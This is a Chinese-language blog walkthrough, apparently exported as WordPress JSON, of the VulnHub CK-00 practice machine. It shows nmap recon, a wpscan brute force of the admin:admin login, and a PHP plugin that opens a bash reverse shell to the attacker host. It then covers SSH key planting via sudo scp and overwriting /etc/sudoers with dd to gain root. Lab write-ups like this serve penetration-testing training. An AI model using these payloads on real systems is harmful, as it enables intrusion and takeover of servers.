\u9019\u662fVulnHub \u5e73\u53f0\u7684\u4e00\u500b\u7528\u65bc\u7df4\u7fd2\u6ef2\u900f\u6e2c\u8a66\u548c\u6f0f\u6d1e\u5229\u7528\u7684\u9776\u6a5f\u3002\u5b83\u88ab\u8a2d\u8a08\u70ba\u4e00\u500b\u7c21\u55ae\u96e3\u5ea6\u7684\u6311\u6230\uff0c\u76ee\u6a19\u662f\u8b93\u6ef2\u900f\u6e2c\u8a66\u4eba\u54e1\u935b\u7df4\u60c5\u8cc7\u641c\u96c6 \u3001\u5f31\u5bc6\u78bc\u5206\u6790\u53ca\u6b0a\u9650\u63d0\u5347\u7684\u6280\u80fd\u3002\u8a72\u9776\u6a5f\u6ef2\u900f\u505a\u6cd5\u5982\u4e0b<\/p>\n\n\n\n
https:\/\/www.vulnhub.com\/entry\/ck-00,444<\/a><\/p>\n\n\n\n <\/p>\n\n\n\n \u5c0b\u627e\u76ee\u6a19<\/p>\n\n\n\n <\/p>\n\n\n\n \u767c\u73fe\u4e3b\u6a5f\u5f8c\u4f7f\u7528nmap\u6383\u63cf<\/p>\n\n\n\n \u767c\u73fessh\u548cweb\u670d\u52d9\uff0c\u4e26\u4f7f\u7528wordpress<\/p>\n\n\n\n <\/p>\n\n\n\n \u4f7f\u7528wpscan\u5206\u6790wordpress\u5f31\u9ede\uff0c\u767c\u73fewordpress\u5f8c\u53f0\u7ba1\u7406\u54e1\u5e33\u5bc6\u70baadmin admin<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u88fd\u4f5c\u4e00\u500bplugin\u4e26\u653e\u5165\u53cd\u5411shell\uff0c\u8a2d\u5b9a\u9023\u56de\u653b\u64ca\u6a5f192.168.0.111:1234\uff0c\u65b9\u5f0f\u5982\u4e0b\uff0c\u7136\u5f8c\u5728wordpress\u5f8c\u53f0\u7684plugins\u9801\u9762\uff0c\u4e0a\u50b3rshellplugin.zip<\/p>\n\n\n\n <\/p>\n\n\n\n \u76e3\u807dport 1234\u53ef\u6210\u529f\u62ff\u5230\u53cd\u5411shell<\/p>\n\n\n\n ps: <\/p>\n\n\n\n <\/p>\n\n\n\n \u641c\u96c6\u60c5\u5831\u5617\u8a66\u5165\u4fb5\u5176\u4ed6\u5e33\u865f\uff0c\u767c\u73fe\u6709bla\u7528\u6236\uff0c\u4e5f\u6709\u7591\u4f3cbla\u7684\u5bc6\u78bc\uff0c\u5617\u8a66\u767b\u5165\u53ef\u6210\u529f<\/p>\n\n\n\n <\/p>\n\n\n\n \u5617\u8a66\u5c07bla\u7684\u6b0a\u9650\u63d0\u5347\uff0c\u4f7f\u7528sudo -l\u767c\u73fescp\u6307\u4ee4\u6709\u9ad8\u6b0a\u9650\uff0c\u56e0\u6b64\u53ef\u5229\u7528\u9019\u9ede\u5c0dssh\u767b\u5165\u8a8d\u8b49\u505a\u624b\u8173<\/p>\n\n\n\n <\/p>\n\n\n\n \u5728\u653b\u64ca\u6a5f\u5236\u505apublic key \u548cprivate key\uff0c\u5206\u5225\u70babla1.pub\u548cbla1<\/p>\n\n\n\n <\/p>\n\n\n\n \u5728\u76ee\u6a19\u6a5f\u4e2d\uff0c\u4ee5bla\u8eab\u4efd\u628a\u653b\u64ca\u6a5f\u7684bla1.pub\u8907\u5236\u5230\/home\/bla1\/.ssh\/authorized_keys<\/p>\n\n\n\n \u5728\u653b\u64ca\u6a5f\u4f7f\u7528bla1\u7528\u6236\u642d\u914dbla1\u7684private key\u4ee5ssh\u65b9\u5f0f\u767b\u5165\u76ee\u6a19\u4e3b\u6a5f<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u7528bla1\u8eab\u4efd\uff0c\u767c\u73fe\u53ef\u4ee5\u4f7f\u7528rbash(restricted\u00a0bash)\u00a0\uff0c\u9019\u662f\u4e00\u7a2e\u529f\u80fd\u5f88\u5c11\u53d7\u9650\u5236\u7684bash\uff0c\u56e0\u6b64\u4f7f\u7528ck-00\u7684\u8eab\u4efd\u53bb\u904b\u884crbash\u9019\u500b\u7a0b\u5e8f\uff0c\u6210\u529f\u5f97\u5230ck-00\u7684shell<\/p>\n\n\n\n \u6aa2\u67e5ck-00\u6b0a\u9650\u5f8c\u767c\u73fe\u80fd\u4ee5root\u8eab\u4efd\u57f7\u884cdd<\/p>\n\n\n\n \u5c07ck-00\u65b0\u6b0a\u9650\u5beb\u5230\/etc\/sudoers<\/p>\n\n\n\n \u6210\u529f\u53d6\u5f97root\u6b0a\u9650\uff0c\u4e26\u53ef\u8b80\u53d6ck00-root-flag.txt<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n refer \u9019\u662fVulnHub \u5e73\u53f0\u7684\u4e00\u500b\u7528\u65bc\u7df4\u7fd2\u6ef2\u900f\u6e2c\u8a66\u548c\u6f0f\u6d1e\u5229\u7528\u7684\u9776\u6a5f\u3002\u5b83\u88ab\u8a2d\u8a08\u70ba\u4e00\u500b\u7c21\u55ae\u96e3\u5ea6\u7684\u6311\u6230\uff0c\u76ee\u6a19\u662f\u8b93\u6ef2\u900f\u6e2c\u8a66\u4eba\u54e1\u935b\u7df4\u60c5\u8cc7\u641c\u96c6 \u3001\u5f31\u5bc6\u78bc\u5206\u6790\u53ca\u6b0a\u9650\u63d0\u5347\u7684\u6280\u80fd\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[27],"tags":[],"class_list":["post-1905","post","type-post","status-publish","format-standard","hentry","category-hackerskill"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1905","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1905"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1905\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1905"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1905"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1905"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\u6536\u96c6\u60c5\u5831<\/h2>\n\n\n\n
$ sudo netdiscover -i eth1\n Currently scanning: 192.168.0.0\/16 | Screen View: Unique Hosts \n \n 3 Captured ARP Req\/Rep packets, from 1 hosts. Total size: 180 \n _____________________________________________________________________________\n IP At MAC Address Count Len MAC Vendor \/ Hostname \n ----------------------------------------------------------------------------- \n 192.168.0.123 08:00:27:6a:4e:4d 1 60 PCS Systemtechnik GmbH <\/code><\/pre>\n\n\n\nt0thkr1s@darlene:~\/Downloads$ sudo nmap -A -Pn -sC -p- 192.168.0.123\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-03-24 09:45 CET\nNmap scan report for 192.168.0.123\nHost is up (0.00043s latency).\nNot shown: 65533 closed ports\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 d2:6f:64:b5:4c:22:ce:b2:c9:8a:ab:57:0e:69:4a:0f (RSA)\n| 256 a8:6f:9c:0e:d2:ee:f8:73:0a:0f:5f:57:1c:2f:59:3a (ECDSA)\n|_ 256 10:8c:55:d4:79:7f:63:0f:ff:ea:c8:fb:73:1e:21:f6 (ED25519)\n80\/tcp open http Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: WordPress 5.2.2\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: CK~00 – Just another WordPress site<\/code><\/pre>\n\n\n\n\u53d6\u5f97wordpress\u7ba1\u7406\u54e1\u6b0a\u9650<\/h2>\n\n\n\n
$ wpscan --url http:\/\/192.168.0.123 -U admin -P \/usr\/share\/wordlists\/rockyou.txt \n...omit...\n[!] Valid Combinations Found:\n | Username: admin, Password: admin<\/code><\/pre>\n\n\n\n\u53d6\u5f97\u53cd\u5411shell<\/h2>\n\n\n\n
$ touch rshell.php\n$ vim rshell.php\n <?php\n \n \/**\n * Plugin Name: Reverse Shell Plugin\n * Plugin URI:\n * Description: Reverse Shell Plugin\n * Version: 1.0\n * Author: raymond\n * Author URI: https:\/\/systw.net\n *\/\n exec(\"\/bin\/bash -c 'bash -i >& \/dev\/tcp\/192.168.0.111\/1234 0>&1'\");\n ?>\n$ zip rshellplugin.zip rshell.php<\/code><\/pre>\n\n\n\n$ nc -nlvp 1234
listening on [any] 1234 ...
...omit...
wwww-data@ck00:\/var\/www\/html\/wp-admin$
wwww-data@ck00:\/var\/www\/html\/wp-admin$ cd \/home\/ck
wwww-data@ck00:\/home\/ck$ ls
...omit...
ck00-local-flag
...omit...<\/pre>\n\n\n\n
\u9664\u4e86\u9019\u500b\u65b9\u6cd5\u5916\uff0c\u4e5f\u53ef\u4ee5\u7528metasploit\u7684\u6a21\u7d44exploit\/unix\/webapp\/wp_admin_shell_upload<\/code>\u4f86\u62ff\u53cd\u5411shell<\/p>\n\n\n\nPrivilege Escalation to bla<\/h2>\n\n\n\n
www-data@ck00:\/var\/www\/html$ cat wp-config.php<\/span>\n...omit...\n\/** MySQL database password *\/\ndefine( 'DB_PASSWORD', 'bla_is_my_password' );\n...omit...\nwww-data@ck00:\/var\/www\/html$ cat \/etc\/passwd\n...omit...\nbla:x:1002:1002:bla,0000,0000,0000:\/home\/bla:\/bin\/bash\n...omit...\nwww-data@ck00:\/var\/www\/html$ su - bla<\/span>\nsu - bla\nPassword: bla_is_my_password<\/span>\nbla@ck00:~$ <\/code><\/pre>\n\n\n\nPrivilege Escalation to bla1<\/h2>\n\n\n\n
bla@ck00:~$ sudo -l<\/span>\nsudo -l\n[sudo] password for bla: bla_is_my_password\n\nMatching Defaults entries for bla on ck00:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser bla may run the following commands on ck00:\n (bla1) \/usr\/bin\/scp<\/code><\/pre>\n\n\n\nattacker@192.168.0.111:~\/Downloads$ ssh-keygen -f bla1<\/span>\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in bla1<\/mark>\nYour public key has been saved in bla1.pub<\/mark>\nThe key fingerprint is:\nSHA256:L\/rdNL1obo0xHAyc76uPzZjPlkc4+VvlS3c2s5kYXgE attacker@192.168.0.111\nThe key's randomart image is:\n+---[RSA 3072]----+\n| . . |\n| + |\n| + E |\n| + . |\n| S o + ..|\n| . O...o|\n| . . o%.=*|\n| . o XOoO+X|\n| ... *OX+o* |\n+----[SHA256]-----+<\/code><\/pre>\n\n\n\nbla@ck00:~$ sudo -u bla1 \/usr\/bin\/scp attacker@192.168.0.111:\/home\/t0thkr1s\/Downloads\/bla1.pub \/home\/bla1\/.ssh\/authorized_keys \nThe authenticity of host '192.168.0.111 (192.168.0.111)' can't be established.\nECDSA key fingerprint is SHA256:g626ptplxc2u6oHhURvhEsEnXQTs8mbygf0VFAIqqeU.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: Permanently added '192.168.0.111' (ECDSA) to the list of known hosts.\nattacker@192.168.0.111's password: \nbla1.pub<\/code><\/pre>\n\n\n\nattacker@192.168.0.111:~\/Downloads$ ssh -i bla1 bla1@192.168.0.123 \nbla1@ck00:~$<\/code><\/pre>\n\n\n\nPrivilege Escalation to ck-00<\/h2>\n\n\n\n
bla1@ck00:~$ sudo -l\nMatching Defaults entries for bla1 on ck00:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\nUser bla1 may run the following commands on ck00:\n (ck-00) NOPASSWD: \/bin\/rbash\nbla1@ck00:~$ sudo -u ck-00 \/bin\/rbash\nTo run a command as administrator (user \"root\"), use \"sudo <command>\".\nSee \"man sudo_root\" for details.\nck-00@ck00:~$ <\/code><\/pre>\n\n\n\nck-00@ck00:~$ sudo -l\nMatching Defaults entries for ck-00 on ck00:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\nUser ck-00 may run the following commands on ck00:\n (root) NOPASSWD: \/bin\/dd<\/code><\/pre>\n\n\n\nck-00@ck00:~$ echo \"ck-00 ALL=(ALL) NOPASSWD: ALL\" | sudo dd of=\/etc\/sudoers\n0+1 records in\n0+1 records out\n30 bytes copied, 0.0000112222 s, 22.1 kB\/s\nck-00@ck00:~$ sudo su\nroot@ck00:\/home\/bla1# \nroot@ck00:\/home\/bla1# ls \/root \n...omit...\nck00-root-flag.txt\n...omit...<\/code><\/pre>\n\n\n\n
https:\/\/medium.com\/infosec-adventures\/ck-00-walkthrough-800be72362b3<\/a>
https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"